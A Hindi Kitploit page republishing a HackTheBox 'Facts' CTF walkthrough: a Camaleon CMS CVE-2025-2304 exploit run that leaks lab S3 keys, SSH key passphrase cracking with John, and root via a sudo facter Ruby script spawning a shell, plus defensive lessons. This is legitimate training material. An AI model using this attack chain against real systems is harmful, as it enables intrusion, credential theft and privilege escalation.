Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
htb-facts — HackTheBox — Facts (आसान/Linux) | CVE-2025-2304 + AWS S3 + SSH कुंजी + Facter विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/mattiapertusati/htb-facts
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षा
GitHubmattiapertusati/htb-facts

htb-facts

4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HackTheBox — Facts (आसान/Linux) | CVE-2025-2304 + AWS S3 + SSH कुंजी + Facter विशेषाधिकार वृद्धि

रिपॉजिटरी देखें

HTB — Facts (Easy/Linux) - सीज़न 10

HTB Difficulty OS Status Techniques Techniques PrivEsc

सारांश

Facts एक आसान Linux मशीन है जिसमें एक ज्ञात भेद्यता (CVE-2025-2304) का शोषण करके Camaleon CMS से लोकल AWS S3 क्रेडेंशियल्स निकालने की आवश्यकता होती है। आंतरिक S3 बकेट्स की एन्यूमरेशन से एक SSH प्राइवेट की मिलती है, जिसे प्रारंभिक एक्सेस पाने के लिए John the Ripper का उपयोग करके क्रैक करना होता है। प्रिविलेज एस्केलेशन /usr/bin/facter पर sudo मिसकॉन्फ़िगरेशन का शोषण करके हासिल किया जाता है, जो रूट शेल पाने के लिए कस्टम Ruby कोड निष्पादित करने की अनुमति देता है।

अटैक चेन: Nmap → Camaleon CMS (CVE-2025-2304) → S3 बकेट एन्यूमरेशन → SSH की क्रैकिंग → sudo facter → Root


रिकॉनिसेंस

पोर्ट स्कैन

चलिए, टारगेट मशीन पर सक्रिय सेवाओं की पहचान करने के लिए Nmap स्कैन से शुरुआत करते हैं। Bash

root@kitploit:~
nmap -sV -sC -oN nmap_facts 10.129.244.96

परिणाम:

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.26.3 (Ubuntu) |_http-title: facts |_http-server-header: nginx/1.26.3 (Ubuntu)

Nmap Scan

Nmap दो खुले पोर्ट दिखाता है: 22 (SSH) और 80 (HTTP)। वेब सर्वर Nginx पर आधारित है। साइट के साथ ठीक से इंटरैक्ट करने से पहले, हमें अपनी /etc/hosts फ़ाइल में facts.htb होस्ट जोड़ना चाहिए।

root@kitploit:~
echo “10.129.244.96 facts.htb” | sudo tee -a /etc/hosts

वेब एन्यूमरेशन

पोर्ट 80 पर साइट विज़िट करने पर हमें एक मानक वेब पेज दिखाई देता है। छिपे हुए पाथ खोजने के लिए, हम डायरेक्टरी brute-force अटैक चलाते हैं (जैसे, ffuf या gobuster का उपयोग करके)।

root@kitploit:~
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://facts.htb/FUZZ

एन्यूमरेशन से एडमिन पैनल (/admin, /admin.php, आदि) से संबंधित कई दिलचस्प डायरेक्टरीज़ का पता चलता है, जो सभी 302 स्टेटस के साथ http://facts.htb/admin/login. पर रिडायरेक्ट करती हैं।

Enumeration

लॉगिन पेज पर जाकर और प्रमाणीकरण करने (या पैनल के फुटर को देखने) पर, हमें साइट के पीछे की तकनीक का पता चलता है: Camaleon CMS।

नीचे दाएं कोने में एक महत्वपूर्ण विवरण हमारा ध्यान खींचता है: CMS का वर्ज़न 2.9.0. है।

Admin Panel


एक्सप्लॉइटेशन

Camaleon CMS (CVE-2025-2304)

यह जानते हुए कि सर्वर Camaleon CMS 2.9.0 चला रहा है, एक त्वरित ऑनलाइन खोज हमें CVE-2025-2304 नामक एक गंभीर भेद्यता तक ले जाती है, जो एक प्रमाणित उपयोगकर्ता से एडमिनिस्ट्रेटर तक प्रिविलेज एस्केलेशन की अनुमति देती है।

हमें GitHub पर एक पब्लिक एक्सप्लॉइट मिलता है (Alien0ne द्वारा बनाया गया) और हम उसे अपनी अटैकर मशीन पर डाउनलोड करते हैं।

GitHub Exploit

हम अपने पास मौजूद क्रेडेंशियल्स (जैसे, mattia:mattia) पास करके एक्सप्लॉइट चलाते हैं, ताकि खुद को एडमिन तक उन्नत कर सकें, संवेदनशील जानकारी निकाल सकें, और फिर कोई स्पष्ट निशान न छोड़ने के लिए मूल भूमिका में वापस आ सकें।

root@kitploit:~
python3 exploit.py -u http://facts.htb -U mattia -P mattia --newpass mattia -e -r

एक्सप्लॉइट का आउटपुट एक खजाना है: यह लोकल AWS S3 क्रेडेंशियल्स और सर्वर द्वारा उपयोग किए जाने वाले आंतरिक एंडपॉइंट को निकालने में सफल रहता है।

  • S3 Access Key: AKIAA103ACAA5953D888

  • S3 Secret Key: ELsaDX4pIZYwPJf+dVdUuoHtkwGsRPvKIGCmDfiR

  • S3 Endpoint: http://localhost:54321 (जो हमारे लिए http://facts.htb:54321 बन जाता है)

Exploit


S3 बकेट एन्यूमरेशन

इन कीज़ के साथ, हम मशीन द्वारा एक्सपोज़ की गई S3 सेवा से इंटरैक्ट करने के लिए अपने लोकल AWS CLI को कॉन्फ़िगर कर सकते हैं।

root@kitploit:~
aws configure
# Enter the Access Key and Secret Key we just found
# Default region: us
# Default output format: json

अब हम कस्टम एंडपॉइंट URL पास करके उपलब्ध बकेट्स की सूची देख सकते हैं:

root@kitploit:~
aws --endpoint-url http://facts.htb:54321 s3 ls

हमें दो बकेट मिलते हैं: internal और randomfacts। internal बकेट को रिकर्सिव रूप से एक्सप्लोर करने पर, हमें कीज़ युक्त एक .ssh फ़ोल्डर मिलता है!

root@kitploit:~
aws --endpoint-url http://facts.htb:54321 s3 ls s3://internal/.ssh/ --recursive

चलिए id_ed25519 फ़ाइल (SSH प्राइवेट की) को अपनी मशीन पर डाउनलोड करते हैं।


SSH की क्रैकिंग

हमारे पास प्राइवेट की है, लेकिन यह एक पासफ़्रेज़ से सुरक्षित है। इसे क्रैक करने के लिए, हम John the Ripper सुइट का उपयोग करेंगे। पहले, हम ssh2john का उपयोग करके की को ऐसे फ़ॉर्मेट में बदलेंगे जिसे John पढ़ सके:

root@kitploit:~
ssh2john id_ed25519 > hash.txt

इसके बाद, हम डिक्शनरी अटैक चलाते हैं (कस्टम वर्डलिस्ट my_guess.txt या क्लासिक rockyou.txt का उपयोग करके):

root@kitploit:~
john --wordlist=my_guess.txt hash.txt

पासवर्ड सफलतापूर्वक क्रैक हो गया: dragonballz। अब हमारे पास सर्वर तक पहुँचने के लिए आवश्यक सब कुछ है!

Exploit


प्रिविलेज एस्केलेशन

अब जब हमारे पास सब कुछ है, हम पहले मिले दूसरे खुले पोर्ट का लाभ उठा सकते हैं: SSH पोर्ट (22)।

root@kitploit:~
ssh -i id_ed25519 [email protected]

हम पहले मिले पासवर्ड का उपयोग करेंगे: dragonballz। हम अंदर हैं!

अब हमें यह पता लगाना है कि root एक्सेस पाने के लिए हम किस पाथ का शोषण कर सकते हैं, इसलिए हम sudo -l का उपयोग करेंगे।

पाथ:

/usr/bin/facter

इस पाथ का शोषण करने के लिए, हम एक मिनी स्क्रिप्ट का उपयोग करेंगे:

root@kitploit:~
echo 'Facter.add(:pwn) do
  setcode do
    exec (“/bin/bash -p”)
  end
end' > /tmp/pwn.rb

और फिर हम इसे चलाएँगे:

root@kitploit:~
sudo /usr/bin/facter --custom-dir=/tmp pwn

SSH

हम आधिकारिक तौर पर root हैं!!!

अब हमें बस हाथ में मौजूद दोनों फ्लैग खोजने हैं :)

FLAG


सीखे गए सबक

आक्रामक दृष्टिकोण

  • फुटर/हेडर में CMS वर्ज़न का खुलासा तुरंत अटैक सरफेस उजागर कर देता है
  • फिंगरप्रिंटिंग के बाद विशिष्ट वर्ज़न पर CVE शोध हमेशा पहला कदम होता है
  • S3 जैसी आंतरिक सेवाएँ ऐसा संवेदनशील डेटा एक्सपोज़ कर सकती हैं जो सार्वजनिक करने के लिए नहीं होता
  • क्लाउड स्टोरेज में SSH प्राइवेट कीज़ एक गंभीर मिसकॉन्फ़िगरेशन है जो वास्तविक वातावरण में देखा जाता है

रक्षात्मक दृष्टिकोण

  • AWS क्रेडेंशियल्स को एप्लिकेशन कोड या सुलभ स्टोरेज में कभी एक्सपोज़ न करें
  • S3 बकेट अनुमतियाँ प्रतिबंधित करें — आंतरिक बकेट कभी भी सार्वजनिक रूप से एन्यूमरेबल नहीं होने चाहिए
  • sudo अनुमतियों का नियमित रूप से ऑडिट करें — NOPASSWD के साथ facter root तक का सीधा रास्ता है
  • CMS सॉफ़्टवेयर अपडेट रखें — CVE-2025-2304 के लिए पैच उपलब्ध था

अटैक चेन सारांश

NMAP — 2 पोर्ट खोजे गए (22, 80) ↓ वेब एन्यूमरेशन — एडमिन सेक्शन मिला ↓ Camaleon CMS -> CVE-2025-2304 ↓ एक्सप्लॉइट + AWS सेटिंग्स ↓ हैश के लिए John the ripper ↓ SSH लॉगिन ↓ Sudo -l ↓ स्क्रिप्ट + निष्पादन ↓ ROOT ✅


संदर्भ

  • CVE-2025-2304
  • Camaleon CMS
  • GTFOBins — facter
  • HackTheBox — Facts
टूल डाउनलोड करें